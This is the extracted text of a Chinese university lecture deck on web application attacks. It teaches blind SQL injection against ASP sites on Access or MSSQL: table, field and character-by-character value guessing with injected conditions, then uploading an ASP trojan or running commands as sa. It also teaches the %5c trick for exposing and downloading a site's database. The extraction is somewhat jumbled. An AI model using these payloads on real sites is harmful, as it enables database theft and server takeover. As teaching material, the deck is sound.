第6章web应用程序攻击课件.ppt

判断数据库的类型 利用返回的错误报告 例：MSSQL 判断数据库的类型 利用数据库系统表 ACCESS——msysobjects MSSQL——sysobjects And (select count(*) from msysobjects)0 And (select count(*) from sysobjects)0 表名的猜解 运气＋经验积累 And (Select count(*) from 表名)0 And exist(select count(*) from 表名 /showdetail.asp?id=49 And (Select Count(*) from Admin)=0 如果页面与ID=49相同，说明附加条件成立，即表Admin存在，反之，即不存在。如此循环，直至猜到表名为止 字段名的猜解 字段名的获取原理同表名 And (Select count(字段名) from 表名)0 And exist(select 字段名 from 表名） 字段名的猜解 ASCII逐字解码法获取字段值 判定字段长度 /showdetail.asp?id=49 and (select top 1 len(username) from Admin)0 当username长度大于0，则条件成立；接着1、 2…… n继续测试，直到条件不成立时，n为usename的长度。 /showdetail.asp?id=49 and (select top 1 asc(mid(username,1,1)) from users）0 n一般取48-122，48是数字0，122是z Asc(mid(username,m,1)) 猜解记录内容 确定记录条数 And (select count(*) from 表名)=n 这里的n是猜解的记录条数 确定记录字段长度 And (select top 1 len(列名) from表名)=n 这里的n是猜解的长度数 控制系统 利用已得到的用户名及口令进入管理后台，上传ASP木马 当数据库的连接用户为sa时，可使用系统存储过程执行命令 常用工具 Domain 3.5 啊D注入工具 NBSI SQL注入的危害 读取、修改或者删除数据库内的数据，获取数据库中的用户名和密码等敏感信息 获得数据库管理员的权限 如果能够再利用SQL Server扩展存储过程和自定义扩展存储过程来执行一些系统命令，攻击者还可以获得该系统的控制权 SQL注入的隐蔽性 SQL注入是从正常的WWW端口访问，防火墙一般不报警，很难发现 2.暴库 暴库 将对方数据库的物理路径暴露出来 物理路径与相对路径 物理路径（绝对路径）：从根目录开始一直到该目录全程的路径 相对路径：相对于其它目录的路径 2.暴库 什么导致了黑客可以成功暴库？ 网站制作者的偷懒 IE与ASP程序对特殊字符”\”解析的不同 暴库手段 Google hack %5c暴库 网络攻防技术 2.暴库 %5c暴库原理 数据库链接文件 一个简短的ASP程序，这段程序主要负责在服务器上找到数据库并与之建立连接。通常这个文件名为:conn.asp Conn.asp 示例 %… Dim db,connstr1,connstr2 Db=”data/mdb.mdb” Connstr1=”Provider = Microsoft.Jet.OLEDB.4.0;DataSource=” Connstr2=connstr1Server.MapPath(db) …% 2.暴库 地址栏中地址改为： /bbs%5cconn.asp 此时，系统会弹出错误页面 %5c是“\”的URL编码方式 在IE地址栏中，“\”与“/”的含义相同，因此IE能够正确将%5c解析成“\” conn.asp却将bbs%5cmdb.mdb看成一个文件，会在目录/即E:\Web目录下去找数据库文件，从而找不到而报出错误 2. 暴库 得到错误信息后如何处理？ 得到数据库名，猜测数据库的真正物理地址 直接下载数据库 注意事项 IE设置要将“显示友好的HTTP错误信息”关闭 对方数据库必须是ACCESS 需要的是二级目录，一级目录很难成功 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 计算机网络安全 何路 第六章 脚本攻击 ——过滤不足造成的攻击 何路 helu@ 本章要求 了解Web应用程序的结构 了解脚本的相关概念 明确脚本攻击的成因 掌握脚本注入攻击、暴库、跨站攻击等攻击方法 本章主要内容 Web应用程序攻击